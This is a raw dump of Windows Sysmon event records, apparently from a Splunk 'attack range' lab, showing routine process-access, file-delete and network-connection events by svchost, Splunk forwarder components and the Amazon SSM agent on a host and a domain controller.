11:16:51.262{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221435Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:51.262{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221434Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:51.262{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221433Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:51.262{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221432Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:51.262{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221431Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:51.262{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-17A3-6216-1505-000000003902}716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221430Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:51.262{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-17A3-6216-1505-000000003902}716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221429Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:51.263{4F8D34B0-17A3-6216-1505-000000003902}716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221428Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:51.137{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04EE9EF148C34EF5675A39106BD4370B,SHA256=3104D1B4BD9A999B154DECA84E23555C01F5B87364304D7A46D448D365C744BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297551Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:52.225{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D37769EE7A6DFE89C68967440BC738A7,SHA256=98134F67350C8E2C0A9188C5A89AC15118C45BB392314D0C2019496E58D6598A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221444Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:52.340{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4B79BA8088886FBA6800117F1BE51C6B,SHA256=E9C3AF6C75439136A8CAF516ACAADBE19578BD81958F818704884ABDA1A9F507,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221443Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:52.153{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35504048BAE0DF618DB929C475A03E40,SHA256=9091B23D64857DE1880819B54ED90A4D23CFC214738C5017F01FC0487E6CF5D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297552Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:53.225{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40212052D283214CC5F71AA08A77398F,SHA256=6C44ECDD61DC030D67D281268A290E5D9D55CB8EEDBDAFEC08CA09CEB590C70F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221445Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:53.216{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73BEE65ED619EDC36540362F35AF79B6,SHA256=EF66AB553A5EE640A430D256C8A3ECC736425F121DBD0A294004D67987C310C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221446Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:54.232{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E53C8C3BD47468AA2E50DF0B4061CD37,SHA256=1987059BECCAE5B341A8199F78AC7E1D11CAAB20450DF7D8B467BD1D4B21747E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297554Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:52.677{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49458-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297553Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:54.244{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D0B949FF4BF68569FE4F019DA8076FD,SHA256=7D11216D7D17B7C050785D574839E59840EF2AC3EC26E1E983D85036D9EE1BDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297556Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:55.414{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-159MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297555Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:55.290{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C4CEA72971EF78FBE1676EB6A728D7D,SHA256=8E8769C5CB83733CB095E98CDB6B012F78BA2F500657E1A497E3EEAEC7BF0EE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221447Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:55.466{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFBF41301B1C0A4E0D1A3F8A880EAE07,SHA256=FF1A19F00E0906692E28E181F6481B0203B8815BE304DECF5BAECF0F654A8D03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221448Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:56.482{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC8DC74703FE9776B804D7BE8796741C,SHA256=788E34B51B803751226EBB590E7D01B5E14D8B3D4CE893491F3ADAE16BA663C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297558Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:56.411{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-160MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297557Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:56.309{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D949AAF217A022217362E8247A98A80D,SHA256=C686747538CB5035D8938CEEFE7487C57BE89D5481B74A874900499FF0586F3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221449Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:57.482{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2ECEAD457DB59EC976D13A8E393CA133,SHA256=D597CA0882DFD91AE3E85CB8CDC4715A39E027EA8476F60A0CD43CAE3BDAA50F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297559Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:57.339{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2A2A5583E43B47C732FCB141C13C7EF,SHA256=A9E39CE914ADA3A7FABB50A00E8C87270CA74EA669DBE90AFEAA5EB2F9D8D6FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221451Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:58.497{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B719A3AEEE7F91523C3FCC2E994CA147,SHA256=52F3791A259CD41E0B7CCCF37F126F97BC75DFDD52EE70FC003DC318E7C8ECA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297560Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:58.369{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84DFE91D953D51A3D295C88B11676840,SHA256=BF463529A6493959B7F9217525EBDA87F1A75FD5DFC2ED9490679D58218AA0BB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221450Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:55.651{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51649-false10.0.1.12-8000- 23542300x8000000000000000221452Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:16:59.513{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=681253FABB7C1D98B7BB623B4C366D44,SHA256=62779DE0ED32F11016BC7048793DCE827E2B7C8D51DF4141C99408BC5DB09C2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297561Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:16:59.371{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B02325D0409122ADF8BC7E0BCACDB87,SHA256=228E8BAD87EAFC70379FE853A2C1BD2C30DD3A2ACA88027E081D171E034CB3E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221453Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:00.544{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DA0698D62E5CD35AEC8CD7C5AEE7696,SHA256=4B639E9C585827CF8151E399810574F8034F9CD06C1C6E12086B3705ABFFB1A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297562Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:00.386{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F96AEAAD38637CF14ABC3A69028A091,SHA256=E76CA86FADE626F6F9E42938D6EB16E8B234BD61BA9B9B5C8506268F1DF510A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221454Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:01.560{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F00866D40B8BE467E54993FF630AFC3,SHA256=0CA8655A5EF67B0BCF54B7E3F3DE5C0F65AA678DAB4BA2DB9E4C78819045FBC1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297572Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:01.542{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-17AD-6216-3007-000000003802}5608C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297571Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:01.542{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297570Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:01.542{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297569Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:01.542{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297568Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:01.542{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297567Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 